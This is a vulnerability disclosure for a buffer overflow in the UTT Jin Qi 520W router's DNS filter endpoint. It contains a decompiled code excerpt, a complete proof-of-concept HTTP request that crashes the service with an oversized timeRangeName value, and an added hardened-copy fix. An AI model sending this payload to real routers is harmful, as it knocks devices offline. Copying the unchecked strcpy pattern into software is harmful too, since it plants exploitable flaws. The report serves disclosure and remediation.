### Key Vulnerability Information Extracted from Screenshot

#### 1. Product and Vendor Information

- **Vendor**: UTT
- **Product**: Jin Qi 520W Router

#### 2. Affected Firmware Versions

- **Version**: `<= v3 v1.7.7-180627`

#### 3. Vulnerability Overview

- **Vulnerability Type**: Buffer Overflow
- **Description**: By accessing the `/goform/formConfigDnsFilterGlobal` endpoint, an attacker can manipulate parameters to trigger a buffer overflow, leading to a Denial of Service (DoS).

#### 4. Vulnerability Details

- **Critical Code**: When `sourceIP` is set to `ipRange`, the `timeRangeName` parameter is not properly validated, resulting in a buffer overflow.
- **Code Example**:

```c
// Critical code snippet (decompiled excerpt; elided parts marked with "...")
src = (char *)websGetVar(a1, "DnsFilterEnable", "");
src_1 = (char *)websGetVar(a1, "timeRangeName", "");  // request-controlled value
// ...
if ( strcmp(v6, "ipRange") || inet_aton(v4, &v11) && inet_aton(v5, &v12) )
{
  // ...
  if ( !strcmp(v6, "ipRange") )
  {
    // ...
    // strcpy copies timeRangeName with no length check on the destination
    strcpy((char *)(InstPointByIndex + 137), src_1);
  }
}
```

#### 5. Proof of Concept (POC)

- **Request Example**:

```http
POST /goform/formConfigDnsFilterGlobal HTTP/1.1
Host: 192.168.1.1
Content-Length: 1822
Cache-Control: max-age=0
Authorization: Digest username="admin", realm="UTT", nonce="80758026511f147977ce8ea9363e038c", uri:
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*
Referer: http://192.168.1.1/IPMac.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788
Connection: close

sourceIP=ipRange&timeRangeName=aaaa... (repeated 'a' characters)
```

#### 6. Response Error Information

- **Response Result**: A large number of repeated 'a' characters causes the HTTP request to time out.
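As an added example (not code from the firmware or from the original report), the `ipRange` branch is shown here with the unbounded `strcpy` replaced by a length-checked copy that rejects an oversized `timeRangeName`. The struct layout, the 32-byte field size and the function names are assumptions; the page only shows that the destination sits at offset 137.

```c
#include <stdio.h>
#include <string.h>

/* Assumed field size: the page does not state how large the destination is. */
#define TIME_RANGE_NAME_MAX 32

/* Hypothetical stand-in for the record the firmware gets from InstPointByIndex. */
struct dns_filter_profile {
    unsigned char other_fields[137];            /* name field sits at offset 137 */
    char time_range_name[TIME_RANGE_NAME_MAX];
    unsigned char trailing_fields[16];          /* what an overflow would clobber */
};

/* Copy src into dst only if it fits with its NUL terminator.
 * Returns 0 on success, -1 on rejection; dst is untouched on rejection. */
int copy_param_checked(char *dst, size_t dst_size, const char *src)
{
    const char *nul;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    nul = memchr(src, '\0', dst_size);          /* scan at most dst_size bytes */
    if (nul == NULL)
        return -1;                              /* too long for the field */
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Hardened form of the ipRange branch: reject instead of strcpy(). */
int set_time_range_name(struct dns_filter_profile *p, const char *source_ip,
                        const char *time_range_name)
{
    if (p == NULL || source_ip == NULL)
        return -1;
    if (strcmp(source_ip, "ipRange") != 0)
        return 0;                               /* branch not taken, nothing copied */
    return copy_param_checked(p->time_range_name, sizeof p->time_range_name,
                              time_range_name);
}

int main(void)
{
    struct dns_filter_profile p = {0};
    char oversized[512];                        /* constructed sample input */
    memset(oversized, 'a', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';
    printf("short name: %d\n", set_time_range_name(&p, "ipRange", "workhours"));
    printf("oversized:  %d\n", set_time_range_name(&p, "ipRange", oversized));
    return 0;
}
```

A handler using this pattern would return an error page on `-1` rather than continue with a truncated name.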
### Key Summary

- The `/goform/formConfigDnsFilterGlobal` interface on the UTT Jin Qi 520W router is vulnerable to a buffer overflow. By crafting a malicious request with specially constructed parameters, an attacker can trigger the vulnerability, causing the service to become unresponsive.